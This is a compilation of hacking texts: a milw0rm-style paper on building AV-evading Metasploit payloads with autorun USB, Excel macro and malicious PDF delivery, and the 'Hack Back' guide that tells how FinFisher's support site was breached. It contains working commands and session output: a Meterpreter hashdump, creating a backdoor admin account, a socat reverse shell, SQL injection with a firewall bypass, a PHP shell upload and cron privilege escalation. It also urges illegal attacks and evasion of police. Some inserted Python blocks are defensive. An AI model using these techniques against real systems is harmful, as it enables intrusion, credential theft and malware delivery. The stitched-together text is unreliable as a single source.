    Your system has all requirements needed to run Fast-Track!

    Fast-Track Main Menu:

    Fast-Track – Where it’s OK to finish in under 3 minutes…
    Version: v4.0
    Written by: David Kennedy (ReL1K)
    http://www.securestate.com
    http://www.thepentest.com

    1. Fast-Track Updates
    2. External Hacking
    3. Internal Hacking
    4. Exploits
    5. SQLPwnage
    6. Payload Generator
    7. Tutorials
    8. Changelog
    9. Credits
    10. About
    11. Exit

    Enter the number: 6
    Configuration file not detected, running default path.
    Recommend running setup.py install to configure Fast-Track.

    #####################################
    ### ###
    ### Metasploit Payload Generator ###
    ### ###
    ### Written by: Dave Kennedy ###
    ### aka ReL1K ###
    ### ###
    #####################################
    #####################################

    The Metasploit Payload Generator is a simple tool to
    make it extremely easy to generate a payload and listener
    on the Metasploit framework. This does not actually
    exploit any systems, it will generate a metasploit payload
    for you and save it to an executable. You then need to
    someone get it on the remote server by yourself and get it
    to execute correctly.

    This will also encode your payload to get past most AV and
    IDS/IPS.

    What payload do you want to generate:

    Name: Description:

    1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
    2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
    3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
    4. Windows Bind Shell Execute payload and create an accepting port on remote system.
    5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to attacker.
    6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on victim through Reflective to attacker.

    Enter choice (example 1-6): 2

    Below is a list of encodings to try and bypass AV.

    Select one of the below, Avoid_UTF8_tolower usually gets past them.

    1. avoid_utf8_tolower
    2. shikata_ga_nai
    3. alpha_mixed
    4. alpha_upper
    5. call4_dword_xor
    6. countdown
    7. fnstenv_mov
    8. jmp_call_additive
    9. nonalpha
    10. nonupper
    11. unicode_mixed
    12. unicode_upper
    13. alpha2
    14. No Encoding

    Enter your choice : 2

    Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.80.131
    Enter the port of the Listener: 5555

    Do you want to create an EXE or Shellcode

    1. Executable
    2. Shellcode

    Enter your choice: 1
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 278
    Options: LHOST=192.168.80.131,LPORT=5555,ENCODING=shikata_ga_nai

    A payload has been created in this directory and is named ‘payload.exe’. Enjoy!

    Do you want to start a listener to receive the payload yes or no: yes

    Launching Listener…
    ***********************************************************************************************

    Launching MSFCLI on ‘exploit/multi/handler’ with PAYLOAD=’windows/meterpreter/reverse_tcp’
    Listening on IP: 192.168.80.131 on Local Port: 5555 Using encoding: ENCODING=shikata_ga_nai

    ***********************************************************************************************
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler…
    [*] Transmitting intermediate stager for over-sized stage…(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage…
    [*] Uploading DLL (75787 bytes)…
    [*] Upload completed.
    [*] Meterpreter session 1 opened (192.168.80.131:5555 -> 192.168.80.1:13948)

    meterpreter > getuid
    Server username: LENOVO-X200\prathan
    meterpreter > use priv
    Loading extension priv…success.
    meterpreter > hashdump
    Administrator:500:F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
    Guest:501:A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
    prathan:1003:879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
    TsInternetUser:1002:52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
    meterpreter > execute -H -i -f cmd.exe
    Process 692 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\prathan\Desktop>hostname
    LENOVO-X200

    C:\Documents and Settings\prathan\Desktop>net user cwh 1234 /add
    net user cwh 1234 /add
    The command completed successfully.

    C:\Documents and Settings\prathan\Desktop>net localgroup administrators cwh /add
    net localgroup administrators cwh /add
    The command completed successfully.

    C:\Documents and Settings\prathan\Desktop>net user
    net user

    User accounts for \\

    ——————————————————————————-
    Administrator cwh Guest
    prathan TsInternetUser
    The command completed with one or more errors.

    [End Result]————————————————————————————

    With the above, we can attack a victim through social engineering if they execute "payload.exe". What happens if we use Autorun.inf to make them execute our file?

    [USB Pwnage]————————————————————————————

    +autorun.inf
    [autorun]
    action=Open Files On Folder
    icon=icons\drive.ico
    shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

    +icons
    +nircmd.exe

    +batexe
    -progstart.bat
    @echo off
    nircmd.exe execmd CALL batexe\moddump.bat
    nircmd.exe execmd CALL batexe\modsmax.bat

    -moddump.bat
    @echo off
    nircmd.exe execmd .\batexe\payload.exe

    -modsmax.bat
    @echo off
    start ..
    nircmd.exe win max ititle "Remo"

    [End File]————————————————————————————-

    If someone opens the USB drive with Autorun, or double-clicks the drive in My Computer, their system is compromised !!

    ++++++++++++++++++++++++++++++++++
    [0x04b] – MS-Office Macro Ownage
    ++++++++++++++++++++++++++++++++++

    MS Word, Excel, PowerPoint, etc. can import VBA macros into their files, and Metasploit can generate VBA that carries a malicious payload !!
    In this example we show the script for exploiting a victim through MS Excel. The victim machine starts a reverse VNC connection to our machine after
    the victim opens the Excel file.

    [Msf script]————————————————————————————

    bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.80.131 V > /tmp/script.bas
    bt framework3 # ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.80.131 DisableCourtesyShell=True E
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler…
    [*] Transmitting intermediate stager for over-sized stage…(191 bytes)
    [*] Sending stage (2658 bytes)
    [*] Sleeping before handling stage…

    [End Result]————————————————————————————

    Now we have "script.bas". Open MS Excel -> Tools -> Macro -> Visual Basic Editor, import "script.bas" and save the Excel file.
    After that, use your social-engineering skill to get them to open the Excel file and enable macros. We then control the target through the VNC viewer with their privileges.

    ++++++++++++++++++++++++++++++++++
    [0x04c] – AdobeReader PDF Ownage
    ++++++++++++++++++++++++++++++++++

    Metasploit has an exploit module that generates a malicious PDF file attacking the "Adobe JBIG2Decode Memory Corruption" flaw.
    The module exploits a heap-based pointer corruption in Adobe Reader 9.0.0 and earlier.
    We generate the malicious PDF, send it to the victim and social-engineer them into opening it. Game Over !!

    [AdobeReader Exploit]—————————————————————————

    bt framework3 # msfconsole
    (msfconsole banner)

    =[ msf v3.3-dev
    + -- --=[ 288 exploits - 124 payloads
    + -- --=[ 17 encoders - 6 nops
    =[ 56 aux

    msf > use windows/fileformat/adobe_jbig2decode
    msf exploit(adobe_jbig2decode) > set TARGET 0
    TARGET => 0
    msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
    FILENAME => malfile.pdf
    msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
    LHOST => 192.168.80.131
    msf exploit(adobe_jbig2decode) > exploit

    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Creating ‘malfile.pdf’ file…
    [*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
    [*] Exploit completed, but no session was created.
    msf exploit(adobe_jbig2decode) > exit
    bt framework3 # ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444
    LHOST=192.168.80.131 E
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler…
    [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
    [*] Sending stage (2650 bytes)
    [*] Sleeping before handling stage…
    [*] Uploading DLL (75787 bytes)…
    [*] Upload completed.
    [*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1041)

    meterpreter > getuid
    Server username: WINXP\victim
    meterpreter > execute -H -i -f cmd.exe
    Process 692 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\victim\Desktop> Ownage Again !!!

    [End Result]————————————————————————————

    Other techniques such as "DNS Spoofing + IE7" were great for mass exploitation; you can see the video at http://www.milw0rm.com/video/watch.php?id=96
    It uses Ettercap for DNS spoofing and Metasploit to handle the reverse shells from the "IE7 MS09-002 Memory Corruption Vulnerability", so every machine on the same network
    is driven to the attacker's machine and ... Game Over !!

    ####################
    [0x06] – Greetz To
    ####################

    Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
    Special Thx : asylu3, str0ke, citec.us, milw0rm.com

    —————————————————-
    This paper is written for educational purposes only. The authors are not responsible for any damage
    originating from using this paper for the wrong objective. If you want to use this knowledge on other people's systems,
    you must request consent from the system owner first.
    —————————————————-

    # milw0rm.com [2009-07-10]

    Hack back


    A DIY Guide for those without the patience to wait for whistleblowers

    –[ 1 ]– Introduction

    I’m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
    it took to 0wn Gamma. I’m writing this to demystify hacking, to show how simple
    it is, and to hopefully inform and inspire you to go out and hack shit. If you
    have no experience with programming or hacking, some of the text below might
    look like a foreign language. Check the resources section at the end to help you
    get started. And trust me, once you’ve learned the basics you’ll realize this
    really is easier than filing a FOIA request.

    –[ 2 ]– Staying Safe

    This is illegal, so you’ll need to take some basic precautions:

    1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
    2) Inside the encrypted volume install Whonix [1]
    3) (Optional) While just having everything go over Tor thanks to Whonix is
    probably sufficient, it’s better to not use an internet connection connected
    to your name or address. A cantenna, aircrack, and reaver can come in handy
    here.

    [0] https://truecrypt.ch/downloads/
    [1] https://www.whonix.org/wiki/Download#Install_Whonix

    As long as you follow common sense: never do anything hacking related
    outside of Whonix, never do any of your normal computer usage inside Whonix,
    never mention any information about your real life when talking with other
    hackers, and never brag about your illegal hacking exploits to friends in real
    life. Then you can pretty much do whatever you want with no fear of being v&.

    NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
    for some things like web browsing, when it comes to using hacking tools like
    nmap, sqlmap, and nikto that are making thousands of requests, they will run
    very slowly over Tor. Not to mention that you’ll want a public IP address to
    receive connect back shells. I recommend using servers you’ve hacked or a VPS
    paid with bitcoin to hack from. That way only the low bandwidth text interface
    between you and the server is over Tor. All the commands you’re running will
    have a nice fast connection to your target.

    –[ 3 ]– Mapping out the target

    Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
    domain names, and reverse whois lookups to find all IP address space and domain
    names associated with an organization.

    [0] http://ha.ckers.org/fierce/

    For an example let’s take Blackwater. We start out knowing their homepage is at
    academi.com. Running fierce.pl -dns academi.com we find the subdomains:
    67.238.84.228 email.academi.com
    67.238.84.242 extranet.academi.com
    67.238.84.240 mail.academi.com
    67.238.84.230 secure.academi.com
    67.238.84.227 vault.academi.com
    54.243.51.249 www.academi.com

    Now we do whois lookups and find the homepage of www.academi.com is hosted on
    Amazon Web Service, while the other IPs are in the range:
    NetRange: 67.238.84.224 – 67.238.84.255
    CIDR: 67.238.84.224/27
    CustName: Blackwater USA
    Address: 850 Puddin Ridge Rd

    Doing a whois lookup on academi.com reveals it’s also registered to the same
    address, so we’ll use that as a string to search with for the reverse whois
    lookups. As far as I know all the actual reverse whois lookup services cost
    money, so I just cheat with google:
    “850 Puddin Ridge Rd” inurl:ip-address-lookup
    “850 Puddin Ridge Rd” inurl:domaintools

    Now run fierce.pl -range on the IP ranges you find to lookup dns names, and
    fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more
    whois lookups and repeat the process until you’ve found everything.

    Also just google the organization and browse around its websites. For example on
    academi.com we find links to a careers portal, an online store, and an employee
    resources page, so now we have some more:
    54.236.143.203 careers.academi.com
    67.132.195.12 academiproshop.com
    67.238.84.236 te.academi.com
    67.238.84.238 property.academi.com
    67.238.84.241 teams.academi.com

    If you repeat the whois lookups and such you’ll find academiproshop.com seems to
    not be hosted or maintained by Blackwater, so scratch that off the list of
    interesting IPs/domains.

    In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com
    was simply a whois lookup of finfisher.com which found it registered to the name
    “FinFisher GmbH”. Googling for:
    “FinFisher GmbH” inurl:domaintools
    finds gamma-international.de, which redirects to finsupport.finfisher.com

    …so now you’ve got some idea how I map out a target.
    This is actually one of the most important parts, as the larger the attack
    surface that you are able to map out, the easier it will be to find a hole
    somewhere in it.

    –[ 4 ]– Scanning & Exploiting

    Scan all the IP ranges you found with nmap to find all services running. Aside
    from a standard port scan, scanning for SNMP is underrated.

    Now for each service you find running:

    1) Is it exposing something it shouldn’t? Sometimes companies will have services
    running that require no authentication and just assume it’s safe because the url
    or IP to access it isn’t public. Maybe fierce found a git subdomain and you can
    go to git.companyname.com/gitweb/ and browse their source code.

    2) Is it horribly misconfigured? Maybe they have an ftp server that allows
    anonymous read or write access to an important directory. Maybe they have a
    database server with a blank admin password (lol stratfor). Maybe their embedded
    devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer’s
    default password.

    3) Is it running an old version of software vulnerable to a public exploit?

    Webservers deserve their own category. For any webservers, including ones nmap
    will often find running on nonstandard ports, I usually:

    1) Browse them. Especially on subdomains that fierce finds which aren’t intended
    for public viewing like test.company.com or dev.company.com you’ll often find
    interesting stuff just by looking at them.

    2) Run nikto [0]. This will check for things like webserver/.svn/,
    webserver/backup/, webserver/phpinfo.php, and a few thousand other common
    mistakes and misconfigurations.

    3) Identify what software is being used on the website. WhatWeb is useful [1]

    4) Depending on what software the website is running, use more specific tools
    like wpscan [2], CMS-Explorer [3], and Joomscan [4].

    First try that against all services to see if any have a misconfiguration,
    publicly known vulnerability, or other easy way in. If not, it’s time to move
    on to finding a new vulnerability:

    5) Custom coded web apps are more fertile ground for bugs than large widely used
    projects, so try those first. I use ZAP [5], and some combination of its
    automated tests along with manually poking around with the help of its
    intercepting proxy.

    6) For the non-custom software they’re running, get a copy to look at. If it’s
    free software you can just download it. If it’s proprietary you can usually
    pirate it. If it’s proprietary and obscure enough that you can’t pirate it you
    can buy it (lame) or find other sites running the same software using google,
    find one that’s easier to hack, and get a copy from them.

    [0] http://www.cirt.net/nikto2
    [1] http://www.morningstarsecurity.com/research/whatweb
    [2] http://wpscan.org/
    [3] https://code.google.com/p/cms-explorer/
    [4] http://sourceforge.net/projects/joomscan/
    [5] https://code.google.com/p/zaproxy/

    For finsupport.finfisher.com the process was:

    * Start nikto running in the background.

    * Visit the website. See nothing but a login page. Quickly check for sqli in the
    login form.

    * See if WhatWeb knows anything about what software the site is running.

    * WhatWeb doesn’t recognize it, so the next question I want answered is if this
    is a custom website by Gamma, or if there are other websites using the same
    software.

    * I view the page source to find a URL I can search on (index.php isn’t
    exactly unique to this software). I pick Scripts/scripts.js.php, and google:
    allinurl:"Scripts/scripts.js.php"

    * I find there’s a handful of other sites using the same software, all coded by
    the same small webdesign firm. It looks like each site is custom coded but
    they share a lot of code. So I hack a couple of them to get a collection of
    code written by the webdesign firm.

    At this point I can see the news stories that journalists will write to drum
    up views: “In a sophisticated, multi-step attack, hackers first compromised a
    web design firm in order to acquire confidential data that would aid them in
    attacking Gamma Group…”

    But it’s really quite easy, done almost on autopilot once you get the hang of
    it. It took all of a couple minutes to:

    * google allinurl:"Scripts/scripts.js.php" and find the other sites

    * Notice they’re all sql injectable in the first url parameter I try.

    * Realize they’re running Apache ModSecurity so I need to use sqlmap [0] with
    the option --tamper='tamper/modsecurityversioned.py'

    * Acquire the admin login information, login and upload a php shell [1] (the
    check for allowable file extensions was done client side in javascript), and
    download the website’s source code.

    [0] http://sqlmap.org/
    [1] https://epinna.github.io/Weevely/

    Looking through the source code they might as well have named it Damn Vulnerable
    Web App v2 [0]. It’s got sqli, LFI, file upload checks done client side in
    javascript, and if you’re unauthenticated the admin page just sends you back to
    the login page with a Location header, but you can have your intercepting proxy
    filter the Location header out and access it just fine.

    [0] http://www.dvwa.co.uk/

    Heading back over to the finsupport site, the admin /BackOffice/ page returns
    403 Forbidden, and I’m having some issues with the LFI, so I switch to using the
    sqli (it’s nice to have a dozen options to choose from). The other sites by the
    web designer all had an injectable print.php, so some quick requests to:
    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
    reveal that finsupport also has print.php and it is injectable. And it’s
    database admin! For MySQL this means you can read and write files. It turns out
    the site has magic_quotes enabled, so I can’t use INTO OUTFILE to write files.
    But I can use a short script that uses sqlmap --file-read to get the php source
    for a URL, and a normal web request to get the HTML, and then finds files
    included or required in the php source, and finds php files linked in the HTML,
    to recursively download the source to the whole site.

    Looking through the source, I see customers can attach a file to their support
    tickets, and there’s no check on the file extension. So I pick a username and
    password out of the customer database, create a support request with a php shell
    attached, and I’m in!
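
Two of the source-review findings above, modelled as an added Python example (not code from the guide or from the software it describes): the admin page that sends a Location header but keeps rendering, which is PHP's header('Location: ...') with no exit() after it, and file-extension checks that exist only in browser JavaScript, which is also the ticket-attachment bug that gave the final foothold. The Response class, the handler functions, the extension allowlist and the magic-byte table are constructed for the illustration; the policy they express (decide authorization and return immediately; validate the name and the content on the server; store uploads under a generated name outside the document root) is the general fix.

```python
# Added example (not from the guide or the software it describes): two of the
# source-review findings modelled in a minimal Python request handler, each
# beside its fix.  Response, the handlers and the allowlist are constructed.
import hashlib
import posixpath


class Response:
    """Minimal stand-in for an HTTP response."""
    def __init__(self, status, headers=None, body=""):
        self.status = status
        self.headers = dict(headers or {})
        self.body = body


ADMIN_HTML = "<h1>BackOffice</h1><a href='/BackOffice/users.php'>users</a>"


def admin_page_vulnerable(session):
    """Mirrors PHP's header('Location: login.php') with no exit() after it.
    The redirect header is set, but the handler carries on and renders the
    page, so a client that simply ignores Location reads the admin content."""
    resp = Response(200)
    if not session.get("admin"):
        resp.status = 302
        resp.headers["Location"] = "/login.php"
        # BUG: no return here, rendering continues below
    resp.body = ADMIN_HTML
    return resp


def admin_page_fixed(session):
    """Decide authorization first and return at once; nothing is rendered
    unless the check passed."""
    if not session.get("admin"):
        return Response(302, {"Location": "/login.php"}, body="")
    return Response(200, body=ADMIN_HTML)


# Server-side upload policy: allowed extensions with the magic bytes each
# type must start with.  A browser-side JavaScript check may stay for
# usability, but it is not a control; only this check counts.
ALLOWED = {
    ".pdf": b"%PDF",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
# Extensions a web server might hand to an interpreter if they appear anywhere
# in the name (shell.php.jpg on a misconfigured Apache, for example).
SERVER_EXECUTED = {"php", "phtml", "php3", "php4", "php5", "phar",
                   "cgi", "pl", "py", "sh"}


def validate_upload(filename, data):
    """Return (ok, reason) for a user-supplied filename and file body."""
    name = posixpath.basename(filename.replace("\\", "/"))  # drop any directory part
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"  # also rejects names such as .htaccess
    ext = "." + parts[-1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if any(p in SERVER_EXECUTED for p in parts[1:-1]):
        return False, "double extension"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    return True, ""


def storage_name(data, ext):
    """Name the stored file by its content, never by the user-supplied name;
    the upload directory itself belongs outside the document root."""
    return hashlib.sha256(data).hexdigest()[:16] + ext


if __name__ == "__main__":
    print("vulnerable, unauthenticated:", admin_page_vulnerable({}).status,
          repr(admin_page_vulnerable({}).body[:20]))
    print("fixed, unauthenticated:", admin_page_fixed({}).status,
          repr(admin_page_fixed({}).body))
    for fn, body in (("shell.php", b"<?php"), ("shell.php.jpg", b"\xff\xd8\xff"),
                     ("photo.jpg", b"<?php"), ("photo.jpg", b"\xff\xd8\xff\xe0")):
        print(fn, validate_upload(fn, body))
```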

    –[ 5 ]– (fail at) Escalating

     ___________
    < got r00t? >
     -----------
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||
    ^^^^^^^^^^^^^^^^

    Root over 50% of linux servers you encounter in the wild with two easy scripts,
    Linux_Exploit_Suggester [0], and unix-privesc-check [1].

    [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester
    [1] https://code.google.com/p/unix-privesc-check/

    finsupport was running the latest version of Debian with no local root exploits,
    but unix-privesc-check returned:
    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
    www-data can write to /etc/cron.hourly/mgmtlicensestatus
    WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
    can write to /etc/cron.hourly/webalizer

    so I add to /etc/cron.hourly/webalizer:
    chown root:root /path/to/my_setuid_shell
    chmod 04755 /path/to/my_setuid_shell

    wait an hour, and ….nothing. Turns out that while the cron process is running
    it doesn’t seem to be actually running cron jobs. Looking in the webalizer
    directory shows it didn’t update stats the previous month. Apparently after
    updating the timezone cron will sometimes run at the wrong time or sometimes not
    run at all and you need to restart cron after changing the timezone. ls -l
    /etc/localtime shows the timezone got updated June 6, the same time webalizer
    stopped recording stats, so that’s probably the issue. At any rate, the only
    thing this server does is host the website, so I already have access to
    everything interesting on it. Root wouldn’t get much of anything new, so I move
    on to the rest of the network.
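
The two unix-privesc-check warnings above come down to one rule: a file that cron runs as root must not be writable by anyone but root, and neither may the directory it lives in. As an added Python example (not from the guide, and not unix-privesc-check's own code), the same check written out as a periodic integrity audit for your own hosts; the directory list is the usual Debian layout, and the reason strings and the self_test() fixture are constructed for the illustration. Run as root it prints one WARNING line per finding in the same spirit as the output quoted above.

```python
# Added example (not from the guide, and not unix-privesc-check's own code):
# audit the cron directories for scripts that cron runs as root but that a
# non-root user could modify.  Reason strings and the self_test() fixture
# are constructed for the illustration.
import os
import shutil
import stat
import tempfile

CRON_DIRS = ["/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly",
             "/etc/cron.monthly", "/etc/cron.d"]


def writable_by_others(st, trusted_uid=0, trusted_gid=0):
    """Reasons why a file with stat result `st` could be modified by someone
    other than the trusted (root) account.  Group write is only a finding
    when the group is not the trusted one; pass trusted_gid=None to flag
    every group-writable file."""
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append("not owned by trusted uid")
    if st.st_mode & stat.S_IWGRP and st.st_gid != trusted_gid:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_cron_dir(directory, trusted_uid=0, trusted_gid=0):
    """Return [(path, reasons)] for the directory itself (a writable directory
    lets anyone drop a new script in) and for each regular file inside it."""
    findings = []
    try:
        dir_st = os.lstat(directory)
    except FileNotFoundError:
        return findings  # not every system has every directory
    dir_reasons = writable_by_others(dir_st, trusted_uid, trusted_gid)
    if dir_reasons:
        findings.append((directory, ["directory " + r for r in dir_reasons]))
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, ["symlink; audit the target separately"]))
        elif stat.S_ISREG(st.st_mode):
            reasons = writable_by_others(st, trusted_uid, trusted_gid)
            if reasons:
                findings.append((path, reasons))
    return findings


def audit_all(dirs=CRON_DIRS, trusted_uid=0, trusted_gid=0):
    """Audit every cron directory and return the combined findings."""
    findings = []
    for d in dirs:
        findings.extend(audit_cron_dir(d, trusted_uid, trusted_gid))
    return findings


def self_test():
    """Build a throwaway cron-style directory with constructed files of
    different modes and audit it, so the checker can be exercised without
    touching /etc.  Returns findings as (basename, reasons) pairs."""
    tmp = tempfile.mkdtemp()
    try:
        os.chmod(tmp, 0o755)
        for name, mode in (("ok", 0o755), ("loose", 0o777), ("grp", 0o664)):
            path = os.path.join(tmp, name)
            with open(path, "w") as f:
                f.write("#!/bin/sh\necho hourly job\n")
            os.chmod(path, mode)
        findings = audit_cron_dir(tmp, trusted_uid=os.getuid(), trusted_gid=None)
        return [(os.path.basename(p), r) for p, r in findings]
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for path, reasons in audit_all():
        print("WARNING: %s: %s" % (path, ", ".join(reasons)))
```

The symlink case is reported rather than resolved on purpose: a root-owned link pointing into a user-writable directory is the same problem one step removed, and deserves a look rather than an automatic pass.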

    –[ 6 ]– Pivoting

    The next step is to look around the local network of the box you hacked. This
    is pretty much the same as the first Scanning & Exploiting step, except that
    from behind the firewall many more interesting services will be exposed. A
    tarball containing a statically linked copy of nmap and all its scripts that you
    can upload and run on any box is very useful for this. The various nfs-* and
    especially smb-* scripts nmap has will be extremely useful.

    The only interesting thing I could get on finsupport’s local network was another
    webserver serving up a folder called ‘qateam’ containing their mobile malware.

    –[ 7 ]– Have Fun

    Once you’re in their networks, the real fun starts. Just use your imagination.
    While I titled this a guide for wannabe whistleblowers, there’s no reason to
    limit yourself to leaking documents. My original plan was to:
    1) Hack Gamma and obtain a copy of the FinSpy server software
    2) Find vulnerabilities in FinSpy server.
    3) Scan the internet for, and hack, all FinSpy C&C servers.
    4) Identify the groups running them.
    5) Use the C&C server to upload and run a program on all targets telling them
    who was spying on them.
    6) Use the C&C server to uninstall FinFisher on all targets.
    7) Join the former C&C servers into a botnet to DDoS Gamma Group.

    It was only after failing to fully hack Gamma and ending up with some
    interesting documents but no copy of the FinSpy server software that I had to
    make do with the far less lulzy backup plan of leaking their stuff while
    mocking them on twitter.
    Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password
    already so I can move on to step 2!

    –[ 8 ]– Other Methods

    The general method I outlined above of scan, find vulnerabilities, and exploit
    is just one way to hack, probably better suited to those with a background in
    programming. There’s no one right way, and any method that works is as good as
    any other. The other main ways that I’ll state without going into detail are:

    1) Exploits in web browsers, java, flash, or microsoft office, combined with
    emailing employees with a convincing message to get them to open the link or
    attachment, or hacking a web site frequented by the employees and adding the
    browser/java/flash exploit to that.
    This is the method used by most of the government hacking groups, but you don’t
    need to be a government with millions to spend on 0day research or subscriptions
    to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
    for a couple thousand, and rent access to one for much less. There’s also
    metasploit browser autopwn, but you’ll probably have better luck with no
    exploits and a fake flash updater prompt.

    2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
    of the time.
    The infosec industry invented a term to make this sound like some sort of
    science: “Social Engineering”. This is probably the way to go if you don’t know
    too much about computers, and it really is all it takes to be a successful
    hacker [0].

    [0] https://www.youtube.com/watch?v=DB6ywr9fngU

    –[ 9 ]– Resources

    Links:

    * https://www.pentesterlab.com/exercises/
    * http://overthewire.org/wargames/
    * http://www.hackthissite.org/
    * http://smashthestack.org/
    * http://www.win.tue.nl/~aeb/linux/hh/hh.html
    * http://www.phrack.com/
    * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
    * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
    * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
    * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
    (all his other blog posts are great too)
    * https://www.corelan.be/ (start at Exploit writing tutorial part 1)
    * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
    One trick it leaves out is that on most systems the apache access log is
    readable only by root, but you can still include from /proc/self/fd/10 or
    whatever fd apache opened it as. It would also be more useful if it mentioned
    what versions of php the various tricks were fixed in.
    * http://www.dest-unreach.org/socat/
    Get usable reverse shells with a statically linked copy of socat to drop on
    your target and:
    target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
    host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
    It’s also useful for setting up weird pivots and all kinds of other stuff.

    Books:

    * The Web Application Hacker’s Handbook
    * Hacking: The Art of Exploitation
    * The Database Hacker’s Handbook
    * The Art of Software Security Assessment
    * A Bug Hunter’s Diary
    * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
    * TCP/IP Illustrated

    Aside from the hacking specific stuff almost anything useful to a system
    administrator for setting up and administering networks will also be useful for
    exploring them. This includes familiarity with the windows command prompt and unix
    shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
    networking, etc.

    –[ 10 ]– Outro

    You’ll notice some of this sounds exactly like what Gamma is doing. Hacking is a
    tool. It’s not selling hacking tools that makes Gamma evil. It’s who their
    customers are targeting and with what purpose that makes them evil. That’s not
    to say that tools are inherently neutral. Hacking is an offensive tool. In the
    same way that guerrilla warfare makes it harder to occupy a country, whenever
    it’s cheaper to attack than to defend it’s harder to maintain illegitimate
    authority and inequality. So I wrote this to try to make hacking easier and more
    accessible. And I wanted to show that the Gamma Group hack really was nothing
    fancy, just standard sqli, and that you do have the ability to go out and take
    similar action.

    Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
    Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
    hackers, dissidents, and criminals!

    Hack back a DIY guide


    –[ 1 – Introduction ]———————————————————-

    You’ll notice the change in language since the last edition [1]. The
    English-speaking world already has tons of books, talks, guides, and
    info about hacking. In that world, there’s plenty of hackers better than me,
    but they misuse their talents working for “defense” contractors, for intelligence
    agencies, to protect banks and corporations, and to defend the status quo.
    Hacker culture was born in the US as a counterculture, but that origin only
    remains in its aesthetics – the rest has been assimilated. At least they can
    wear a t-shirt, dye their hair blue, use their hacker names, and feel like
    rebels while they work for the Man.

    You used to have to sneak into offices to leak documents [2]. You used to need
    a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
    Like the CNT said after the Gamma Group hack: “Let’s take a step forward with
    new forms of struggle” [5]. Hacking is a powerful tool, let’s learn and fight!

